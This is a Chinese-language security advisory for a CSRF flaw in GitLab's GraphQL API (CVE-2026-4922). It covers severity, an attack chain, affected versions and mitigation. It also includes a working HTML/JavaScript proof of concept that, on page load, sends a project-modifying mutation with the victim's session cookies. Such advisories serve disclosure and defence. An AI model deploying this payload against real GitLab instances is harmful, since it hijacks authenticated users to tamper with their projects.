CVE-2026-4922 GitLab CSRF漏洞致未认证GraphQL变更

漏洞信息

漏洞编号

CVE-2026-4922

漏洞类型

CSRF (跨站请求伪造)

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

GitLab CE/EE

漏洞概述

GitLab CE/EE 存在严重的跨站请求伪造（CSRF）漏洞，由于对 GraphQL 变更请求的保护不足，未经身份验证的攻击者可诱导已认证用户执行恶意操作。该漏洞影响 17.0 至 18.11.1 之前的多个版本，可能导致数据泄露或篡改，CVSS 评分为 8.1，属于高危漏洞，建议管理员立即修复。

技术细节

该漏洞源于 GitLab 在处理 GraphQL 接口时未能正确实施 CSRF 防护机制。CSRF 是一种利用用户在已登录 Web 应用程序中的身份验证信息来执行非预期操作的攻击方式。在受影响的 GitLab 版本中，特定的 GraphQL mutation 端点缺少对请求来源的严格验证（如缺乏有效的 Anti-CSRF Token 检查）。攻击者可以精心构造一个恶意网页，其中包含隐藏的表单或 AJAX 请求，目标指向受害 GitLab 实例的 /api/graphql 端点。当具有管理员或其他高权限的用户访问此恶意页面时，浏览器会自动携带用户的登录凭证向服务器发送请求。由于服务器信任了浏览器的 Cookie 且未校验请求的合法性，攻击者便成功冒充受害者执行了 GraphQL 操作。虽然攻击需要用户交互（UI:R），但其攻击复杂度低（AC:L）且无需预先认证（PR:N），一旦成功，将对系统的机密性和完整性造成严重影响。

攻击链分析

STEP 1

1. 侦察

攻击者识别出一个使用受影响版本 GitLab (17.0 至 18.11.1 之前) 的目标实例。

STEP 2

2. 载荷构造

攻击者创建一个恶意的 HTML 页面，其中包含针对 GitLab GraphQL API 的 JavaScript 代码，旨在执行特定的变更操作（如修改设置或数据）。

STEP 3

3. 投递

攻击者通过电子邮件、即时通讯或其他社会工程学手段，将恶意链接发送给目标 GitLab 实例的已认证用户。

STEP 4

4. 触发

受害者点击链接并在浏览器中加载页面。此时，浏览器自动携带受害者的 Session Cookie 向 GitLab 服务器发送 GraphQL 请求。

STEP 5

5. 执行

由于 CSRF 保护缺失，GitLab 服务器处理该请求并执行攻击者定义的 GraphQL 变更，导致数据完整性受损或敏感信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
  PoC for CVE-2026-4922: GitLab GraphQL CSRF
  Description: This HTML snippet demonstrates how an attacker could trigger a GraphQL mutation on a vulnerable GitLab instance.
  Usage: Replace TARGET_GITLAB with the actual domain and host this file. Send the link to an authenticated victim.
-->
<html>
  <body>
    <script>
      function exploit() {
        // The attacker crafts a malicious GraphQL mutation.
        // This is a generic example payload structure.
        const query = `mutation {
          updateProject(input: { id: "gid://gitlab/Project/1", description: "PWNED" }) {
            project {
              description
            }
            errors {
              message
            }
          }
        }`;

        // Send the request to the target GitLab instance
        // The browser automatically includes the session cookies
        fetch('https://<TARGET_GITLAB>/api/graphql', {
          method: 'POST',
          headers: {
            'Content-Type': 'application/json',
            'Accept': 'application/json'
          },
          body: JSON.stringify({ query: query }),
          credentials: 'include'
        })
        .then(response => response.json())
        .then(data => console.log('CSRF Exploit Result:', data))
        .catch(error => console.error('Error:', error));
      }

      // Trigger the exploit automatically when the page loads
      window.onload = exploit;
    </script>
    <p>GitLab CSRF PoC executing... check console.</p>
  </body>
</html>

影响范围

GitLab CE/EE >= 17.0, < 18.9.6

GitLab CE/EE >= 18.10, < 18.10.4

GitLab CE/EE >= 18.11, < 18.11.1

防御指南

临时缓解措施

如果无法立即升级，建议管理员限制对 GitLab 实例的网络访问，仅允许可信的内部 IP 地址访问。同时，加强用户安全教育，提醒用户不要点击不明来源的链接或访问可疑网站，以降低被社工攻击的风险。